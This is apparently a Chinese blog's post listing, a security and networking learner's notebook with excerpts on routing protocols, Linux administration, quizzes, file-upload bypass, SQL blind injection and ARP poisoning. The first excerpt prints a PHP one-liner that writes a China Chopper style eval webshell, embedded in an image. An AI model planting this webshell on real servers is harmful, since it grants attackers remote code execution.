自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(51)
  • 收藏
  • 关注

原创 edjpgcom制作一句话图片木马

将图片直接拖到edjpgcom.exe程序上写入一句话木马<?fputs(fopen("shell1.php","w"),'<?php @eval($_POST[caidao]);?>')?>查看图片

2019-06-19 22:13:37 6917 2

原创 DVWA之File Upload文件上传

LOW:函数介绍:basename()函数返回路径中的文件名部分。string basename ( string $path [, string $suffix ] )参数介绍:$path:必需。规定要检查的路径。在Windows中,斜线(/)和反斜线(\)都可以用作目录分隔符。在其它环境下是斜线(/)。$suffix:可选。规定文件扩展名。如果文件有suffix,则不会输出这个...

2019-06-19 22:13:27 443 2

原创 文件包含漏洞小结

1. 原理在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。开发过程中,多个文件都会用到的代码,通常会放到一个单独的文件中,用到时再包含进来。当把包含的文件写死在程序中时,该漏洞是不存在的,但很多情况都会动态的去包含所需的文件,这时候则会产生文件包含漏洞。实例代码<?php $filename...

2019-06-19 11:07:51 521

原创 文件上传校验方式及绕过思路

文件上传校验方式客户端javascript校验(一般只校验后缀名)服务端校验文件头content-type字段校验(image/gif)文件内容头校验(GIF89a)后缀名黑名单校验后缀名白名单校验自定义正则校验WAF设备校验(根据不同的WAF产品而定)1. 客户端校验一般都是在网页上写一段javascript脚本,校验上传文件的后缀名,有白名单形式也有黑名单形式。判断...

2019-06-17 22:48:44 7522 1

原创 文件上传漏洞

原理一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中,再通过url去访问以执行代码。漏洞起因对于上传文件的后缀名没有做严格的限制对于上传文件的MIMETYPE没有做检查没有限制上传的文件的文件权限对于上传文件或者指定目录的行为没有做限制漏洞测试过程正常上传,抓包分析尝试上传不同类型的恶意脚本文...

2019-06-17 22:44:32 207

原创 常用MIME Type表

多用途互联网邮件扩展(MIME,MultipurposeInternet Mail Extensions)是一个互联网标准,它扩展了电子邮件标准,使其能够支持非ASCII字符、二进制格式附件等多种格式的邮件消息。内容类型(Content-Type),这个头部领域用于指定消息的类型。一般以下面的形式出现。[type]/[subtype]text/plain(纯文本) text/html(HT...

2019-06-16 22:33:51 447

原创 布尔型盲注基本思路

普通SQL注入SQL盲注执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注)一般在页面上直接就会显示执行sql语句的结果一般在页面上不会直接显示sql执行的结果有可能出现不确定sql是否执...

2019-06-10 21:42:56 2389 1

原创 SQL注入中常用的函数

mid()函数SELECT MID(ColumnName, Start [, Length])从指定字段中提取出字段的内容column_name:字段名start:开始位置length:长度实例Persons 表:IdLastNameFirstNameAddressCity1AdamsJohnOxfordStreet2BushGeorge...

2019-06-09 19:42:32 4615

原创 yum的配置与使用

yum简介yum的全称是yellow dog updater,modified,是一个shell前端软件包管理器;基于RPM包管理,能够从指定的服务器下载RPM包并自动安装,可以自动处理依赖性关系,并且一次性安装所有依赖的软件包,无需一次次频繁的下载、安装。yum源制作过程准备一台linux服务器,并确认服务器的IP;上传一个centOS-…iso镜像文件到服务器(镜像文件包含所...

2019-04-26 13:31:11 208 1

原创 MPLS-多协议标签技术

MPLS(Multi-Protocol Label Switching多协议标签交换)ISP使用包交换:依赖报文中的IP地址进行数据转发标签交换:基于2.5层的标签号进行数据转发;无论网络层运行何种协议,2.5层均可运行标签交换;解决问题:解决BGP的路由黑洞问题MPLS VPNMPLS TE(流量工程)包交换的技术原始的路由:流量进入路由器后,路由器基于目标IP...

2019-04-18 17:07:35 3762

原创 生成树协议802.1D

二层桥接环路导致问题广播风暴当主机X发送一个广播包后假设SWITCH A在SEGMENT1收到广播包后,SWITCH A收到数据包后把数据广播到所有端口(除了数据包进入的端口)SWITCH B在SEGMENT 2网络收到数据包后会把数据广播到所有端口(除了数据包进入的端口)SWITCH A在SEGMENT 1网络收到数据包后会把数据广播到所有端口(除了数据包进入的端口)。以此继续就会...

2019-04-12 08:25:02 1372

原创 VLAN接口类型

VLANVLAN(Virtual Local Area Network)即虚拟局域网,是将一个物理的LAN在逻辑上划分成多个广播域的通信技术。作用限制广播域:广播域被限制在一个VLAN内,节省了带宽,提高了网络处理能力。增强局域网的安全性:不同VLAN内的报文在传输时是相互隔离的,即一个VLAN内的用户不能和其它VLAN内的用户直接通信。提高网络的健壮性:故障被限制在一个V...

2019-04-10 15:24:58 4478

原创 PPPoE工作流程

PPPoE(英语:Point-to-Point Protocol Over Ethernet)以太网上的点对点协议,是将点对点协议(PPP)封装在以太网(Ethernet)框架中的一种网络隧道协议。PPPoE协议及其工作过程PPPoE的工作过程分成两个阶段,即发现阶段(Discorvery)和PPP会话阶段。发现阶段(Discovery Stage)用户主机用广播的方式发出PADI...

2019-04-09 17:10:05 3357

原创 ARP毒化攻击

ARP欺骗(毒化)上面提到过了ARP缓存表,在每台主机都有一个ARP缓存表,缓存表中记录了IP地址与MAC地址的对应关系,而局域网数据传输依靠的是MAC地址。假设主机 A 192.168.1.2,B 192.168.1.3,C 192.168.1.4; 网关 G 192.168.1.1; 在同一局域网,主机A和B通过网关G相互通信,就好比A和B两个人写信,由邮递员G送信,C永远都不会知道A和B...

2019-04-08 13:24:21 2086

原创 5种类型的ARP工作过程

ARP(Address Resolution Protocol)地址转换协议,工作在OSI模型的数据链路层,在以太网中,网络设备之间互相通信是用MAC地址而不是IP地址,ARP协议就是用来把IP地址转换为MAC地址的。而RARP和ARP相反,它是反向地址转换协议,把MAC地址转换为IP地址。普通ARP(正向ARP)功能介绍:通过ip地址获得MAC地址工作过程:网络设备A发送数据包给网络设备...

2019-04-06 09:34:17 5072 2

原创 FTP原理解析

文件传输协议FTP(File Transfer Protocol)是因特网中使用最广泛的文件传输协议。FTP使用交互式的访问,允许客户指定文件的类型和格式(如指明是否使用ASCII码),并允许文件具有存取权限(如访问文件的用户必须经过授权,并输入有效的口令)。文件传输协议有基于TCP的FTP和基于UDP的简单文件传输协议TFTP,它们都是文件共享协议中的一大类,即复制整个文件,其特点是:若要存取...

2019-04-05 11:12:22 982

原创 DHCP原理解析及工作过程

什么是DHCP?DHCP,动态主机配置协议,前身是BOOTP协议,是一个局域网的网络协议,使用UDP协议工作,常用的2个端口:67(DHCP server),68(DHCP client)。DHCP通常被用于局域网环境,主要作用是集中的管理、分配IP地址,使client动态的获得IP地址、Gateway地址、DNS服务器地址等信息,并能够提升地址的使用率。简单来说,DHCP就是一个不需要账号密...

2019-04-04 19:19:09 3015 1

原创 DNS原理及解析过程

DNS(域名系统Domain Name System)根域就是所谓的“.”,其实我们的网址www.baidu.com在配置当中应该是www.baidu.com.(最后有一点),一般我们在浏览器里输入时会省略后面的点,而这也已经成为了习惯。根域服务器我们知道有13台,但是这是错误的观点。根域服务器只是具有13个IP地址,但机器数量却不是13台,因为这些IP地址借助了任播的技术,所以我们可以...

2019-04-03 16:13:51 313 1

原创 TCP的定时器

7种定时器建立连接定时器(connection-establishment timer)重传定时器(retransmission timer)延迟应答定时器(delayed ACK timer)坚持定时器(persist timer)保活定时器(keepalive timer)FIN_WAIT_2定时器(FIN_WAIT_2 timer)TIME_WAIT定时器 (TIME_WAI...

2019-04-02 16:34:46 225

原创 BGP-边界网关协议

BGP(Border Gateway Protocol边界网关协议)无类别路径矢量EGP协议;基于AS进行工作;AS(自治系统):一个独立的管理域,内部可以运行多种IGP协议,但半径不易过大;为区分不同的AS,使用编号:0-65535公有:1-64511 私有:64512-65535IGP和EGP协议的区别IGP协议在工作时:收敛快占用资源少选路佳EGP协议在工...

2019-03-31 10:53:22 20843 4

原创 TCP三次握手和四次挥手

TCP报头字段含义URG紧急指针是否有效。为1,表示某一位需要被优先处理ACK确认号是否有效,一般置为1PSH提示接收端应用程序立即从TCP缓冲区把数据读走RST对方要求重新建立连接,复位SYN请求建立连接,并在其序列号的字段进行序列号的初始值设定。建立连接,设置为1FIN希望断开连接seq:占4个字节,用来标记数据段的顺序,...

2019-03-26 17:17:26 444 1

原创 OSPF-开放最短路径优先协议

OSPF(Open Shortest Path First 开放式最短路径优先)无类别链路状态路由协议组播更新:224.0.0.5/224.0.0.6触发更新、周期更新(30min)跨层封装到网络层:协议号89支持等开销负载均衡:默认4条、最大6条;IOS版本12.4以上支持16条基于LSA更新:导致更新量很大结构化部署:区域划分1. 数据包HELLO:邻居的发现、建立、...

2019-03-06 16:40:41 2823

原创 路由器工作原理

定义路由器(router)是互联网的枢纽,是连接英特网中各局域网、广域网的设备,它会根据信道的情况自动选择和设定路由,以最佳路径,按前后顺序发送数据。作用在OSI模型的第三层,提供了路由与转发两种重要机制路由:路由器控制层面的工作,决定数据包从来源端到目的端所经过的路由路径(host到host至今的最佳传输路径)转发:路由器数据层面的工作,将路由器输入端的数据包移送至适当的路由器输出端...

2019-02-05 15:00:34 125482 8

iptables 与 firewalld 防火墙

防火墙管理工具众所周知,相较于企业内网,外部的公网环境更加恶劣,罪恶丛生。在公网与企业内网之间充当保护屏障的防火墙,虽然有软件或硬件之分,但主要功能都是依据策略对穿越防火墙自身的流量进行过滤。防火墙策略可以基于流量的源目地址、端口号、协议、应用等信息来定制,然后防火墙使用预先定制的策略规则监控出入的流量,若流量与某一条策略规则相匹配,则执行相应的处理,反之则丢弃。这样一来,就可以保证仅有合...

2018-12-21 15:48:01 250

原创 RAID和LVM磁盘阵列技术

RAID(独立磁盘冗余阵列)RAID是英文Redundant Array of Independent Disks的缩写,中文简称为独立冗余磁盘阵列。简单的说,RAID是一种把多块独立的硬盘(物理硬盘)按不同的方式组合起来形成一个硬盘组(逻辑硬盘),从而提供比单个硬盘更高的存储性能和提供数据备份技术。组成磁盘阵列的不同方式称为RAID级别(RAID Levels)。在用户看起来,组成的磁盘组就...

2018-12-17 19:42:16 464

原创 RHEL7搭建Discuz论坛

RHEL7中配置关闭防火墙和selinux[root@localhost ~]# systemctl stop firewalld[root@localhost ~]# setenforce 0安装php[root@localhost ~]# yum install php* -y安装httpd服务[root@localhost ~]# yum install htt...

2018-12-12 22:22:40 438

原创 RHEL7网络管理

第一种:修改网卡配置信息[root@localhost ~]# vim etc/sysconfig/network-scripts/ifcfg-eno16777736更改配置文件TYPE=Ethernet (网卡类型)BOOTPROTO=static (地址分配模式) NAME=eno16777736 (网卡名称)ONBOOT=yes (是否启动)IPADDR=192.16...

2018-12-04 14:28:17 626

原创 RHEL7的磁盘配额

磁盘管理的概念:Linux系统是多用户任务操作系统,在使用系统时,会出现多用户共同使用一个磁盘的情况,如果其中少数几个用户占用了大量的磁盘空间,势必压缩其他用户的磁盘的空间和使用权限。因此,系统管理员应该适当的开放磁盘的权限给用户,以妥善分配系统资源。什么是磁盘配额:磁盘配额是一种磁盘空间的管理机制,使用磁盘配额可限制用户或组在某个特定文件系统中所能使用的最大空间。实验:针对ext4格式...

2018-11-28 09:30:30 949

原创 RIP的基本原理与实现

RIP(Routing Information Protocol,路由信息协议)基于UDP520端口,是一种内部网关协议(IGP),是一种动态路由选择协议,用于自治系统(AS)内的路由信息的传递。RIP协议基于距离矢量算法(DistanceVectorAlgorithms),度量基于跳数,16跳为网络不可达。RIP应用于OSI网络七层模型的网络层。管理距离(AD)优先级是120。RIP的计时器和...

2018-11-23 20:24:12 12703 2

原创 IPV6 邻居发现协议(NDP)

IPV6除了显著增加了地址空间外,另一个最显著的特征就是它的即插即用性。邻居发现协议(Neighbor Discovery Protocol)

2018-11-14 16:03:39 16300 1

原创 PAP认证和CHAP认证原理解析

PAP(PasswordAuthenticationProtocol 密码认证协议)PAP 是 PPP 协议集中的一种链路控制协议,通过2次握手建立认证,对等结点持续重复发送 ID/ 密码(明文)给验证者,直至认证得到响应或连接终止,常见于pppoe拨号环境中。PAP认证过程首先被认证端向认证端发送认证请求(包含用户名和密码),以明文形式进行传输,认证端接到认证请求,再根据被认证端发送来的...

2018-11-02 11:50:58 37220 3

原创 每日练习17

网络中各个节点相互连接的形式,叫做网络的( )。正确答案: A 你的答案: A (正确)A.拓扑结构B.协议C.分层结构D.分组结构网桥是用于 () 的设备。正确答案: D 你的答案: D (正确)A.物理层B.网络层C.应用层D.数据链路层下列对用户账户叙述正确的是( )正确答案: B 你的答案: D (错误)A.用户账户就是指计算机账户...

2018-10-31 19:38:43 510

原创 每日练习16

OSI的中文含义是( )正确答案: C 你的答案: C (正确)A.网络通信协议B.国家信息基础设施C.开放系统互联D.公共数据通信A 通过计算机网络给 B 发送消息,说其同意签订合同。随后 A 反悔,不承认发过该消息。为防止这种情况发生,在计算机网络中应采用 () 技术。正确答案: D 你的答案: D (正确)A.消息认证B.数据加密C.防火墙D.数字签...

2018-10-30 11:24:48 811

原创 每日练习15

地址“128.10.0.0”是 () 地址。正确答案: B 你的答案: B (正确)A.A类B.B类C.C类D.D类int fun(int a){ a = (1 &lt;&lt; 5) - 1; return a;}fun(21)结果是()正确答案: D 你的答案: A (错误)A.10B8C.5D.31解析:答案:D1&lt;&lt;5,...

2018-10-29 13:22:29 349

原创 每日练习14

超文本的含义是 () 。正确答案: C 你的答案: C (正确)A.该文本中含有声音B.该文本中含有二进制数C.该文本中含有链接到其他文本的链接点D.该文本中含有图像十进制 220 转换为二进制后为?正确答案: D 你的答案: D (正确)A.11011010B.11100110C.11101000D.11011100RIP是基于距离矢量的内部网关协...

2018-10-26 11:18:49 267 2

原创 每日练习13

在OSI七层结构模型中,处于数据链路层与运输层之间的是( )。正确答案: B 你的答案: B (正确)A.物理层B.网络层C.会话层D.表示层在多媒体课件中,课件能够根据用户答题情况给予正确和错误的回复,突出显示了多媒体技术的( )正确答案: D 你的答案: D (正确)A.多样性B.非线性C.集成性D.交互性若计算机的电源突然中断了,则丢失的内容...

2018-10-25 15:53:49 557

原创 每日联系12

机器运算发生溢出的根本原因是 _______ 。正确答案: A 你的答案: A (正确)A.数据的位数有限B.运算中将符号位的进位丢弃C.运算中将符号位的借位丢弃D.数据运算中的错误一个IPv4 地址表示193.168.125.0/30,其中,30表示主机的位数这句话正确与否?正确答案: B 你的答案: B (正确)A.正确B.错误当一个UDP报文道达目的主...

2018-10-24 12:53:19 379

原创 每日练习11

x &amp;gt; 0 || y == 5的相反表达式为( )。正确答案: B 你的答案: B (正确)A.x &amp;lt;= 0 || y!=5B.x &amp;lt;= 0 &amp;amp;&amp;amp; y!=5C.x &amp;gt; 0 || y != 5D.x &amp;gt; 0 &amp;amp;&amp;amp; y == 5下列程序的执行结果是()

2018-10-24 12:42:14 1109

原创 每日练习10

C 类 IP 地址的最高三个比特位,从高到低依次是 (B) 。A.010B.110C.100D.101以下四种介质中,带宽最大的是__C_A.同轴电缆(coaxial)B.双绞线(twisted pair)C.光纤(twisted pair)D.同步线(synchronous)有 10 个站连接到以太网上。若 10 个站都连接到一个 10Mbit/s 以太网集线器上...

2018-10-22 21:22:22 405

原创 每日练习9

计算机网络是一门综合技术,其主要技术是BA.计算机技术与多媒体技术B.计算机技术与通信技术C.电子技术与通信技术D.数字技术与模拟技术下面关于位运算符的叙述,正确的是(C)A.||表示&quot;按位或&quot;的运算B.#表示&quot;按位异或&quot;的运算C.&amp;amp;表示&quot;按位与&quot;的运算D.~表示&quot;按位异或&quot;的运算解析:

2018-10-21 20:14:07 454

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除